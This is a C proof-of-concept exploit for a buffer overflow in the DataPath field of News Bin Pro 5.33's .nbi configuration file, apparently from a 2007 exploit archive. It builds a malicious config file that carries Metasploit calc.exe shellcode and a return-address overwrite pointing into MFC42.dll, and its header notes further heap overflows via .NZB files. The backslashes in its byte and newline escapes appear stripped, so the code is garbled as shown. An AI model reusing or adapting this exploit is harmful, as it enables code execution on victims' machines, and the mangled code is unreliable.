/***************************************************************************
*                                                                           *
* News Bin Pro 5.33 .NBI File Buffer Overflow exploit                       *
*                                                                           *
*                                                                           *
* There are 2 buffer overflow in News Bin Pro 5.33 that can be triggered    *
* by a crafted .nbi config file.                                            *
* DataPath and DownloadPath sizes are not checked and code execution is     *
* possible.                                                                 *
*                                                                           *
* This vulnerability also exists in News Bin 4.x but since .nbi is not      *
* associated with News Bin this can only be triggered by loading the file   *
* manually.                                                                 *
*                                                                           *
* I would also add that:                                                    *
* -News Bin 4.x is vulnerable to a heap overflow with a .NZB file that      *
*  contains a long group field. The vulnerability is triggered after having *
*  started download a malformed post.                                       *
*  Impact: DoS for XP SP2, Code exec for XP SP1 and XP.                     *
*                                                                           *
* -News Bin 5.33 is vulnerable to a heap overflow with a .NZB file that     *
*  contains a long group field. The vulnerability is triggered after having *
*  started download a malformed post and after having clicked on            *
*  "Delete All Posts".                                                      *
*  Impact: Code exec on XP, XP SP1, DoS on XP SP2, but code exec might be   *
*  possible (Im not sure).                                                  *
*                                                                           *
* Tested on XP SP2 FR.                                                      *
* Coded and discovered by Marsu <MarsupilamiPowa@hotmail.fr>                *
*                                                                           *
*   Note: thx aux Bananas et a la KryptonIT. Bon courage aux inuITs :P      *
***************************************************************************/


#include "stdlib.h"
#include "stdio.h"
#include "string.h"


/* win32_exec -  EXITFUNC=thread CMD=calc.exe Size=164 Encoder=Pex http://metasploit.com */
/*BAD CHARS ARE 0x00 0x5D 0x5b 0x0a 0x0d*/
char calcshellcode[] =
"x33xc9x83xe9xddxe8xffxffxffxffxc0x5ex81x76x0ex26"
"x50xbfx4bx83xeexfcxe2xf4xdaxb8xfbx4bx26x50x34x0e"
"x1axdbxc3x4ex5ex51x50xc0x69x48x34x14x06x51x54x02"
"xadx64x34x4axc8x61x7fxd2x8axd4x7fx3fx21x91x75x46"
"x27x92x54xbfx1dx04x9bx4fx53xb5x34x14x02x51x54x2d"
"xadx5cxf4xc0x79x4cxbexa0xadx4cx34x4axcdxd9xe3x6f"
"x22x93x8ex8bx42xdbxffx7bxa3x90xc7x47xadx10xb3xc0"
"x56x4cx12xc0x4ex58x54x42xadxd0x0fx4bx26x50x34x23"
"x1ax0fx8exbdx46x06x36xb3xa5x90xc4x1bx4exbfx71xab"
"x46x38x27xb5xacx5exe8xb4xc1x33xdex27x45x7exdax33"
"x43x50xbfx4b";




char rest[]="DownloadPath=pathnDiskThreshold=0nCacheTimeout=14nUseRateLimit=0nPurgeRecords=0nMaxRetries=10nInitRecords=500000nThumbCount=3nUpdateWhenStarted=0nRecycleServers=0nShowPAR=0nSortIgnoreRE=1nHideIncompletes=0nMultiTab=1nAutoOLD=0nScratchPars=1nRestartPauseTime=60nHiRes=0nUseBwScreenSaver=0nUseBwTimers=0nUseBwTimeLimit=0nLimitOnTime=0nLimitOffTime=0nRateLimit=0nSigCache=1nAutoSave=1nAutoShutdown=0nShowMotd=0nAssemblePrio=1nStrictYENC=0nAutoAssemble=0nInitBrowsePath=0nOldPicker=1nChunkPurge=3nAutosaveInterva=10nPostLimiter=0nMaxPosts=0nn"
"[Logging]nLogging=0nLogErrors=0nLogFiles=0nLogHeaders=0nLogBody=0nLogOverwrite=0nn"
"[Debug]nShowCommands=1nn"
"[TABS]nGroupsPos=0nDownloadPos=2nScratchPos=2nFailedPos=2nFilesPos=2nShowAutoRAR=1nAutoRARPos=2nShowSearch=0nSearchPos=1nShowConnections=1nConnectionPos=2nShowStatus=1nStatusPos=2nShowThumbNails=1nThumbsPos=2nShowServers=1nServersPos=0nPostsPos=1nRPBPos=1nImageDbasePos=1nDownloadHistoryPos=1nn"
"[DESCRIPTIONS]nFileDescriptions=0nDescSubject=1nDescFrom=1nDescDate=0nn"
"$[Filename]nAutoRename=1nDirectoryMode=1nMP3_TagMode=0nn"
"[IMAGESAFE]nImageSafe=0nn"
"[Nzb]nNZB_ObeyGlobal=0nNZB_DD_Autoload=1nNZB_ClickToPost=0nNZB_LoadSingle=0nNZB_PathClean=1nNZB_PathCleanRE=^(\d+_)|(msgid_\d+_)nNZB_ScanFoldernNZB_NameFolder=1nNZB_AutoToPost=0nn"
"[Unsorted]nFilterProfile=GlobalnActive=1nIsExpanded=1nn"
"[Groups]nalt.binaries.pictures.autosnn"
"[alt.binaries.pictures.autos]nFilterProfile=GlobalnActive=1nParent=Automobilesnn"
"[Automobiles]nFilterProfile=GlobalnActive=1nIsExpanded=1nn"
"[Topics]nAutomobilesnn"
"[My_Server]nAddress=news.free.frnActive=1nUseAuth=0nPort=119nSlaveServer=0nFillServer=0nConnectionLimit=2nPriority=0nBytesDownloaded=0nUseFirewall=1nColor=10547360nn"
"[Servers]nMy_Servern";




char defaultfilename[]="file.nbi";

int main(int argc, char* argv[]) {

FILE *file;
char * pad;
char *filename;
char *myshell;

printf("[+] Newsbin Pro 5.33 Configuration file DataPath Buffer Overflow Exploitn");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
myshell=calcshellcode;

file=fopen(defaultfilename,"wb");

pad = (char*)malloc(sizeof(char)*520);
memset(pad,'A',520);

// call [esp+C] in MFC42.dll. I took the first I got. Dont think this is universal! 
// Play with that if it doesnt work, or look for a pop pop pop ret.
memcpy(pad+512,"xb6x82xdbx73x00",5);
memcpy(pad,myshell,strlen(myshell));
									
fprintf(file,"n[Settings]nDataPath=");
fprintf(file,pad);
fprintf(file,"n");
fprintf(file,rest);
fclose(file);

printf("[+] File generated! Have funn");
return 0;
}

// www.Syue.com [2007-02-21]